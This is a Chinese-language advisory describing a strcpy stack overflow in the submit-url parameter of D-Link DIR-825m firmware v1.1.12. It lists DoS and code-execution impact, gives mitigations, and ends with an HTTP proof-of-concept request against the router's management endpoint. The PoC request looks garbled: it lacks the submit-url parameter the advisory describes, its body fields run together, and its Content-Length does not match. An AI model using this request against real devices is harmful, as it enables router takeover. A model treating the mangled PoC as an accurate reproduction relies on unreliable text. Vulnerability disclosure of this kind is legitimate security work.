# D-Link DIR-825m v1.1.12 缓冲区溢出漏洞总结 ## 漏洞概述 * **漏洞名称**:Buffer Overflow in /boafrm/formWanConfig1gSetup * **漏洞类型**:缓冲区溢出 (Buffer Overflow) * **受影响产品**:D-Link DIR-825m * **受影响版本**:Firmware v1.1.12 * **漏洞位置**:`/boafrm/formWanConfig1gSetup` 端点 * **根本原因**:在 `sub_4148A8` 函数中,程序使用 `strcpy` 函数解析来自请求的 `submit-url` 参数。由于缺乏程序边界检查,攻击者可以提供一个超大的 `submit-url` 参数来覆盖程序栈,导致栈溢出。 ## 影响范围 * **拒绝服务 (DoS)**:崩溃 Web 服务器进程,使设备管理界面不可访问。 * **任意代码执行 (RCE)**:通过覆盖栈上的返回地址重定向程序执行流,攻击者可能获得设备的完全控制权。 * **网络攻击**:成功利用后,攻击者可以接管路由器监控网络流量,或将其作为跳板攻击网络中的其他设备。 ## 修复方案 * **建议**:升级固件至最新版本(官方未提供具体补丁版本,建议联系厂商获取更新)。 * **临时缓解**:如果可能,限制对管理界面的访问,或过滤传入请求中的 `submit-url` 参数长度。 ## 概念验证代码 (PoC) ```http POST /boafrm/formWanConfig1gSetup HTTP/1.1 Host: 192.168.0.1 Content-Length: 319 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Origin: http://192.168.0.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36 Accept-Language: zh-CN,zh;q=0.9 Accept-Encoding: gzip, deflate, br Cookie: webuiCookie=eb0d9vqZbgYfEt2zJd80n Connection: keep-alive wanIndex=0&wanName=wanType=0&wanIp=wan_mask=wan_gateway=static1=ip4c110n5=4d51=4d5=24ddcpMTU512e=1500 ```